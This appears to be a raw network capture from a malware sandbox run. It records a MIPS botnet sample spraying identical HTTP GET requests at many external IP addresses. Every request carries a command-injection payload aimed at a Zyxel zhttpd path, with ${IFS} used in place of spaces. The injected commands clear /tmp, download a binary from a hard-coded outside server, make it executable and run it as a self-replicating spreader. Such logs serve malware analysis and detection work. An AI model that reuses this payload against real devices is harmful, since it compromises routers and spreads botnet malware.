                                    Jan 13, 2024 19:02:25.987585068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2452192.168.2.1337900219.217.175.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987623930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2453192.168.2.1342226174.190.0.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987659931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2454192.168.2.1343464104.92.181.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987692118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2455192.168.2.1333372113.41.169.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987732887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2456192.168.2.1332962129.132.222.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987783909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2457192.168.2.134712041.245.177.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987827063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2458192.168.2.13375225.91.167.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987860918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2459192.168.2.135196037.3.61.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987878084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2460192.168.2.1353848158.2.36.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987915993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2461192.168.2.135000825.39.226.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987945080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2462192.168.2.133345646.43.223.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.987988949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2463192.168.2.1338654149.249.86.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988018036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2464192.168.2.1350276138.19.165.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988073111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2465192.168.2.134884650.83.221.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988101959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2466192.168.2.134369869.168.22.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988112926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2467192.168.2.1357996175.57.213.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988164902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2468192.168.2.1334080204.185.219.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988205910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2469192.168.2.1335106211.85.144.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988234997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2470192.168.2.1352190219.122.220.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988267899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2471192.168.2.1337918117.227.18.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988320112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2472192.168.2.134455651.49.59.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988359928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2473192.168.2.1348204203.25.228.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988398075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2474192.168.2.134131683.213.3.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988435984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2475192.168.2.1342052199.175.25.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988472939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2476192.168.2.1353840186.130.11.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988528013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2477192.168.2.136028296.161.169.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988550901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2478192.168.2.1333706156.246.227.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988575935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2479192.168.2.1357546118.69.33.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988617897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2480192.168.2.1344968149.174.121.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988620043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2481192.168.2.1360214181.33.181.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988645077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2482192.168.2.1357420204.49.187.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988678932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2483192.168.2.1356160140.66.220.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988717079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2484192.168.2.134770289.81.244.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988776922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2485192.168.2.133982065.192.193.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988804102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2486192.168.2.1342634168.213.90.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988853931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2487192.168.2.1354168192.116.63.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988888025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2488192.168.2.1342300134.214.62.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988925934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2489192.168.2.1360096119.195.65.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988955021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2490192.168.2.1356420213.196.67.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.988990068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2491192.168.2.135234432.140.199.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989028931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2492192.168.2.1344788101.219.62.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989062071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2493192.168.2.135271213.25.81.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989101887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2494192.168.2.1340944201.228.126.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989125013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2495192.168.2.1347112144.194.164.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989161015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2496192.168.2.134650675.90.9.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989195108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2497192.168.2.1359660172.119.126.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989228010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2498192.168.2.1349864116.93.246.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989269018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2499192.168.2.1351688153.219.46.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989317894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2500192.168.2.1341936221.48.230.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989362955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2501192.168.2.1332772187.58.115.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989420891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2502192.168.2.1335198155.204.198.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989443064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2503192.168.2.1360898117.42.151.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989465952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2504192.168.2.133438646.84.209.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989506006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2505192.168.2.135644248.98.253.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989531040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2506192.168.2.1358314107.174.245.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989569902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2507192.168.2.134100250.170.152.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989624977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2508192.168.2.1340614146.111.174.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989664078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2509192.168.2.1351932161.227.180.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989718914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2510192.168.2.1342552181.29.175.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989763021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2511192.168.2.134819243.158.1.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989799023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2512192.168.2.1347944221.132.123.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989828110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2513192.168.2.1353136116.115.156.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989862919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2514192.168.2.135319647.96.107.83443
                                    TimestampBytes transferredDirectionData
